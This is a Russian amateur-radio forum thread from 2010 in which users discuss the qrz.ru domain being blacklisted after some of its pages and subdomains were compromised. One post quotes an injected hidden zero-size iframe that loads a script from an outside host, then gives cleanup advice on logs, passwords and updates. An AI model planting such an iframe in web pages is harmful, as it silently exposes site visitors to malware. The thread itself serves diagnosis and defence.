-
13.04.2010, 13:14 #181
- Регистрация
- 25.01.2008
- Адрес
- Донецк
- Возраст
- 72
- Сообщений
- 2,257
- Поблагодарили
- 574
- Поблагодарил
- 238
Их забота, а проблемы то ваши? Народ всполошился, неделями антивирями компы сканируют.
Добавлено через 5 минут
Интернет ресурсы имеют свои антивири...обнаружили трояны на этом сайте и блокируют доступ к нему.Это забота о наших компах, и наши антивири пока курят в сторонке..отдыхаютПоследний раз редактировалось UX0IM; 13.04.2010 в 13:14. Причина: Добавлено сообщение
73! Мурад. ex UD6DMC
-
13.04.2010, 13:39 #182
- Регистрация
- 07.04.2002
- Адрес
- г.Москва, г.Троицк
- Возраст
- 47
- Сообщений
- 9,071
- Записей в дневнике
- 8
- Поблагодарили
- 2364
- Поблагодарил
- 7154
73! Anton RC3C (ex.RV3DHC) & RY3AAL & 5ØRDXØØ3 & RK5AØØ2SWL
• Клубы 4U1A, RC5C, 5ØRDXØØØ/C, New Moscow DX Club • DMR 2503041 • D-STAR XLX937-B • YSF 25001 • EchoLink 2102
• RL3F QSL Print • Фото для QSL • FT8DigiClub • DXCluster • APRS2.RU • LogHX
-
13.04.2010, 14:08 #183
- Регистрация
- 16.04.2005
- Адрес
- Moscow_Лось
- Возраст
- 72
- Сообщений
- 2,321
- Поблагодарили
- 334
- Поблагодарил
- 217
...вот тока щаз сработал Аваст - блокировал подключение к QRZ-ту.Сделал быструю проверку Вебом, Каспером и Авастом - ничего ..."тихо".
73! Евгений
-
13.04.2010, 14:35 #184
- Регистрация
- 26.12.2006
- Адрес
- Москва, Россия
- Возраст
- 89
- Сообщений
- 248
- Поблагодарили
- 22
- Поблагодарил
- 2
На QRZ в день раз по сто захожу, а всё никак не словлю ничего. Стоит XP SP3 со всеми обновлениями+Каспер6+Outpost Fireval Pro 2009. Браузер- IE7. Что хоть делать надо, чтобы увидеть то, что здесь обсуждается?
Или, я уже ужасно инфицирован, а об этом не знаю?Игорь (UA3FDS) :: Путь наш во мраке...
-
13.04.2010, 14:59 #185
- Регистрация
- 18.09.2007
- Адрес
- Нальчик, Кабардино-Балкария
- Возраст
- 44
- Сообщений
- 1,223
- Поблагодарили
- 209
- Поблагодарил
- 112
Да нет, вы не правы.
Как раз из-за "их забот" ВЕСЬ домен qrz.ru попадает в черные списки.
Оттого куча неудобств пользователям.
Например тем, кто работает под Mozilla Firefox.
Добавлено через 1 минуту
Дело в том, что заражены бывают поддомены 3-го уровня, сидящие на qrz.ru на которые вы не ходите.Последний раз редактировалось RA6XTD; 13.04.2010 в 14:59. Причина: Добавлено сообщение
-
13.04.2010, 15:01 #186
- Регистрация
- 19.11.2009
- Адрес
- Североуральск
- Возраст
- 67
- Сообщений
- 88
- Поблагодарили
- 39
- Поблагодарил
- 50
-
13.04.2010, 15:06 #187
- Регистрация
- 18.09.2007
- Адрес
- Нальчик, Кабардино-Балкария
- Возраст
- 44
- Сообщений
- 1,223
- Поблагодарили
- 209
- Поблагодарил
- 112
Вы не путайте, когда ваш компьютре УЖЕ заразился и две другие ситуации:
- антивирус блокирует вредоносный код на html страничке
- доменное имя попало в черные списки различных сервисов в Интернете т.к. на сайтах поддоменов содержались странички с вредоносным кодом.
Вот сейчас ситуация последняя. Из-за влома некоторых поддоменов, сидящих на qrz.ru (типа ua9lak.qrz.ru) весь домен попал в черные списки. Поэтому браузеры типа Mozilla Firefox, Opera ругаются на любой поддомен домена qrz.ru как на ПОТЕНЦИАЛЬНО опасный. Что затрудняет работу.
Никто не говорит, что СЕЙЧАС зайдя на forum.qrz.ru можно что-то подхватить.
-
13.04.2010, 15:42 #188
- Регистрация
- 26.12.2006
- Адрес
- Москва, Россия
- Возраст
- 89
- Сообщений
- 248
- Поблагодарили
- 22
- Поблагодарил
- 2
-
13.04.2010, 16:15 #189
-
13.04.2010, 17:44 #190
-
13.04.2010, 18:13 #191
-
13.04.2010, 19:10 #192
-
13.04.2010, 19:15 #193
- Регистрация
- 07.08.2005
- Адрес
- Москва
- Возраст
- 53
- Сообщений
- 1,298
- Поблагодарили
- 374
- Поблагодарил
- 613
-
13.04.2010, 19:23 #194
- Регистрация
- 25.03.2009
- Сообщений
- 1,972
- Записей в дневнике
- 5
- Поблагодарили
- 1041
- Поблагодарил
- 699
-
13.04.2010, 19:26 #195
- Регистрация
- 28.05.2002
- Адрес
- г.Модиин
- Возраст
- 50
- Сообщений
- 304
- Поблагодарили
- 18
- Поблагодарил
- 21
Если требуются конструктивные предложения, то могу могу посоветовать один из методов выявления зараженных страниц (уверен, что 9OTY знает об этом, но может быть будет кому-то ещё полезно).
Итак, как я вижу, на главной странице qrz.ru до сих пор находится эксплоит < iframe src="http : // trfistc.info /for.cgi?009" width="0" height="0" style="visibility: hidden;" >< /iframe >. Сейчас он бездействует, т.к. адрес указанный выше выдаёт ERROR 403: Forbidden. Поэтому антивирусы прекратили "кричать", хотя в Google видят этот код и не снимают бан с домейна.
Видать хакеры приостановили свою черную деятельность. Но наверняка временно.
У меня когда-то были подобные проблемы с коммерческими сайтами. Я сделал следующее. Я не стал сразу удалять вредоносный код, а посмотрел на дату последнего изменения файла в котором находится хакерский код. Если файл не был изменён автором сайта после внедрения эксплоита, то по дате можно искать в логах веб сервера (а также ftp и ssh) кем был внесён этот код. По найденным данным (в частности по IP хакера) можно найти и другие пораженные страницы на сайте и вычистить их.
Труднее всего найти дырки, через которые хакеры пролезли, и если дыры не найдены, то необходимо поменять пароли к базе данных, ФТП и другим сервисам сайта, а также произвести апдейты программ типа форумов. Как правило, дыры находят в популярных программах с открытым кодом.
Кстати, надо убрать упоминания о серверных компонентах со страниц сайта. Так например, в HTML можно увидеть
"Powered by Apache 1.3.33 Unix web server + MySQL 4.1 server"
Кому это надо? Правильно, хакерам.
Добавлено через 2 минуты
боюсь, ФТП будет недостаточно. см. мой коммент вышеПоследний раз редактировалось 4Z5LZ / RA9APZ; 13.04.2010 в 19:26. Причина: Добавлено сообщение
73!
HAM Radio поисковик: http://www.dxportal.com/
Telnet DX cluster: http://www.cqplanet.com/
Log: http://4z5lz.dxportal.com/
Дневник: http://cq-alex.livejournal.com/
Социальные закладки